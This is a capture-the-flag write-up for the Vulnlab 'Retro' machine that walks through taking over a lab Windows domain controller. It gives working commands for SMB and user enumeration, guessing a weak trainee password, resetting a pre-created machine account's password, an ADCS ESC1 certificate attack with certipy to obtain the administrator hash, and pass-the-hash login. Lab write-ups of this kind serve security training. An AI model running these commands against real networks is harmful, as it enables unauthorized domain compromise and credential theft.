CTF-Writeups/Vulnlab/Retro.md

Vulnlab - Retro

NMAP

PORT      STATE SERVICE    VERSION          
53/tcp    open  tcpwrapped
88/tcp open  kerberos-sec Microsoft Windows Kerberos
135/tcp   open  tcpwrapped                      
139/tcp   open  tcpwrapped                           
445/tcp   open  tcpwrapped
593/tcp   open  tcpwrapped      
636/tcp   open  tcpwrapped
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-23T21:06:31
| Not valid after:  2024-07-22T21:06:31
| MD5:   c1f0bac716e071c2bcb943273d569612
|_SHA-1: 7f37ea6965982430f9180a65bcadde76add6fea6
3389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-25T09:53:42
| Not valid after:  2024-01-24T09:53:42
| MD5:   89ccbcee0485b170bbd1ebee3de93784
|_SHA-1: 2bfca683288bc59e2d2f9ffe01775d871c8c272d
9389/tcp  open  tcpwrapped
49664/tcp open  tcpwrapped
49672/tcp open  tcpwrapped
49683/tcp open  tcpwrapped
49708/tcp open  tcpwrapped

On Enumerating SMB with null authentication we can find few shares

From the Trainees share, we'll get Important.txt which talks about having weak passwords on the trainees account and also mentions about bundling all of their account into one general trainee account

So verifying if the account is trainee through kebrute

kerbrute userenum --dc 10.10.108.245 -d retro.vl user.txt

We could have figured this out without guessing as well through lookupsid.py from impacket with anonymous user

lookupsid.py anonymous@10.10.99.152 -no-pass

Since this account has a weak password, we can try common things like password being trainee, verifying it through crackmapexec

cme smb 10.10.99.152 -u 'trainee' -p 'trainee' --shares

We can now access Notes share and find a ToDo.txt file which talks about pre-created computer accounts

https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/

If we go back to the output of lookupsid, we'll see a computer account BANKING$

The password for this account is the same as the name, on trying to login, it will show `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`

In order to use this account, we need to change the password and this can be done through kpasswd which requires /etc/krb.conf to be modified

kpasswd BANKING$

This can be verified again with cme that the password has been changed

Enumerating ADCS with certipy , we see that authenticated users have enrollment rights but there isn't any template which be used with trainee user

However checking the BANKING$ account, there's a template RetroClients on which domain computer have enrollment rights which can allow the machine accounts to enroll certificate on behalf of other users leading to ESC1 attack

certipy find -u 'BANKING$' -p 'Pass' -dc-ip 10.10.99.152 -stdout -vulnerable

On requesting administrator's certificate, it's going to show an error that it doesn't meet the minimum key size which by default certipy sends with 2048 length

Specifying the key size to be of 4096 will resolve this issue

certipy req -u 'banking$'@retro.vl -p 'P@ss12345' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator' -key-size 4096 

With this certificate, administrator's hash can be retrieved

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'retro.vl' -dc-ip 10.10.99.152

Through evil-winrm we can login on WinRM using the NThash of administrator

References

• https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/